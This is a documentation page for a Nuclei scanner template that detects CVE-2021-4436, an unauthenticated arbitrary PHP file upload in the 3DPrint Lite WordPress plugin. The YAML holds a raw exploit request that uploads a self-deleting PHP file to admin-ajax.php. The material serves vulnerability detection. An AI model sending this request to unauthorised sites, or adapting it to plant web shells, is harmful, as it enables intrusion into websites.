Skip to content
Nuclei Templates

3DPrint Lite < 1.9.1.5 - Arbitrary File Upload

ID: CVE-2021-4436

Severity: critical

Author: s4e-io

Tags: cve,cve2021,3dprint-lite,file-upload,instrusive,wpscan,wordpress,wp-plugin,intrusive

Description

Section titled “Description”

The plugin does not have any authorisation and does not check the uploaded file in its p3dlite_handle_upload AJAX action , allowing unauthenticated users to upload arbitrary file to the web server. However, there is a .htaccess, preventing the file to be accessed on Web servers such as Apache.

YAML Source

Section titled “YAML Source”
id: CVE-2021-4436


info:
  name: 3DPrint Lite < 1.9.1.5 - Arbitrary File Upload
  author: s4e-io
  severity: critical
  description: |
    The plugin does not have any authorisation and does not check the uploaded file in its p3dlite_handle_upload AJAX action , allowing unauthenticated users to upload arbitrary file to the web server. However, there is a .htaccess, preventing the file to be accessed on Web servers such as Apache.
  remediation: Fixed in 1.9.1.5
  reference:
    - https://wpscan.com/vulnerability/c46ecd0d-a132-4ad6-b936-8acde3a09282/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-4436
    - https://github.com/fkie-cad/nvd-json-data-feeds
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-4436
    cwe-id: CWE-434
    epss-score: 0.00412
    epss-percentile: 0.73863
    cpe: cpe:2.3:a:wp3dprinting:3dprint_lite:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: wp3dprinting
    product: 3dprint_lite
    framework: wordpress
    publicwww-query: "/wp-content/plugins/3dprint-lite/"
  tags: cve,cve2021,3dprint-lite,file-upload,instrusive,wpscan,wordpress,wp-plugin,intrusive


variables:
  string: "{{randstr}}"
  filename: "{{to_lower(rand_text_alpha(5))}}"


http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=---------------------------54331109111293931601238262353


        -----------------------------54331109111293931601238262353
        Content-Disposition: form-data; name="action"


        p3dlite_handle_upload
        -----------------------------54331109111293931601238262353
        Content-Disposition: form-data; name="file"; filename="{{filename}}.php"
        Content-Type: text/php


        <?php echo "{{string}}";unlink(__FILE__);?>
        -----------------------------54331109111293931601238262353--


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"jsonrpc":"2.0"'
          - '"filename":'
          - "{{filename}}.php"
        condition: and


      - type: status
        status:
          - 200
# digest: 490a0046304402202840842ba665b89e421db47e1677ae4c87d26adb4b67a3ae6174ed9b97ce9e2102203bd32a87b899ce873580c478d31e5f112d71e8e886a7e27c120caaab5893ca44:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-4436.yaml"

View on Github